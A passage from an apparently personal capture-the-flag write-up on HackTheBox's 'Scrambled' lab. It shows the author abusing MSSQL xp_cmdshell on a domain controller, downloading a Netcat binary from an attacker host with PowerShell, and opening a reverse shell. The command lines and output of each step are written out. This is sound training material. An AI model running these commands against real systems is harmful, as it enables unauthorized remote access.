xp_cmdshell

the impersonated administrator user being a sysadmin user within the mssql server, i am able to execute os commands via the xp_cmdshell function

SQL (SCRM\administrator  dbo@master)> enable_xp_cmdshell
[*] info(dc1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] info(dc1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE

the built-in function, enable_xp_cmdshell, can be used to enable the xp_cmdshell function

SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami 
output        
-----------   
scrm\sqlsvc   
 
NULL          
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell hostname
output   
------   
DC1      
 
NULL     
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell ipconfig
output                                                                 
--------------------------------------------------------------------   
NULL                                                                   
 
Windows IP Configuration                                               
 
NULL                                                                   
 
NULL                                                                   
 
ethernet adapter ethernet0 2:                                          
 
NULL                                                                   
 
   connection-specific dns suffix  . : htb                             
 
   ipv6 address. . . . . . . . . . . : dead:beef::248                  
 
   ipv6 address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba   
 
   link-local ipv6 address . . . . . : fe80::489:296d:9719:61ba%14     
 
   ipv4 address. . . . . . . . . . . : 10.10.11.168                    
 
   subnet mask . . . . . . . . . . . : 255.255.254.0                   
 
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14     
 
                                       10.10.10.2                      
 
NULL

Initial Foothold established to the target system as the sqlsvc account via exploiting the MSSQL instance with forged TGS ticket

Establishing A Stable Session

Although the initial foothold has been already made, command execution must be conducted through an interactive SQL session shell. It makes it very tedious. So I can attempt to “upgrade” it to a much stable session shell

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c mkdir C:\tmp"
output                                                                             
--------------------------------------------------------------------------------   
mkdir : Access to the path 'tmp' is denied.                                        
 
At line:1 char:1                                                                   
 
+ mkdir C:\tmp                                                                     
 
+ ~~~~~~~~~~~~                                                                     
 
    + CategoryInfo          : PermissionDenied: (C:\tmp:String) [New-Item], UnauthorizedAccessException   
 
    + FullyQualifiedErrorId : CreateDirectoryUnauthorizedAccessError,Microsoft.PowerShell.Commands.NewItemCommand   
 
                                                                                   
 
NULL

Attempting to create an arbitrary directory at the system root fails This indicates that the sqlsvc account doesn’t have write access to the system root

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c ls C:\"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               
 
NULL                                                                               
 
    Directory: C:\                                                                 
 
NULL                                                                               
 
NULL                                                                               
 
Mode                LastWriteTime         Length Name                                                                     
 
----                -------------         ------ ----                                                                     
 
d-----       03/11/2021     23:44                inetpub                                                                  
 
d-----       31/10/2021     21:13                PerfLogs                                                                 
 
d-r---       01/06/2022     12:43                Program Files                                                            
 
d-----       03/11/2021     16:50                Program Files (x86)                                                      
 
d-----       01/11/2021     15:21                Shares                                                                   
 
d-----       08/11/2021     00:39                Temp                                                                     
 
d-r---       05/11/2021     14:56                Users                                                                    
 
d-----       08/06/2022     23:39                Windows                                                                  
 
NULL                                                                               
 
NULL                                                                               
 
NULL
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c ls C:\Temp"
output   
------   
NULL     
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c icacls C:\Temp"
output                                                      
---------------------------------------------------------   
C:\Temp BUILTIN\Users:(OI)(CI)(M)                           
 
        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)                  
 
        BUILTIN\Administrators:(I)(OI)(CI)(F)               
 
        BUILTIN\Users:(I)(OI)(CI)(RX)                       
 
        CREATOR OWNER:(I)(OI)(CI)(IO)(F)                    
 
NULL                                                        
 
Successfully processed 1 files; Failed processing 0 files   
 
NULL

Interestingly, there is an empty directory, C:\Temp, and it is modifiable ((M))by all users

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c iwr http://10.10.16.8/nc64.exe -Outfile C:\Temp\nc64.exe"
output   
------   
NULL

I will transfer a Netcat binary in the directory

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -ep bypass -c C:\Temp\nc64.exe 10.10.16.8 9999 -e powershell"
 
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ nnc 9999        
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.168] 52528
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
scrm\sqlsvc
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::248
   IPv6 Address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba
   Link-local IPv6 Address . . . . . : fe80::489:296d:9719:61ba%14
   IPv4 Address. . . . . . . . . . . : 10.10.11.168
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14
                                       10.10.10.2

Upgraded

InfoSec LAB

Explorer

Scrambled_Exploitation

xp_cmdshell

Establishing A Stable Session

Interactive Graph View

Table of Contents

Backlinks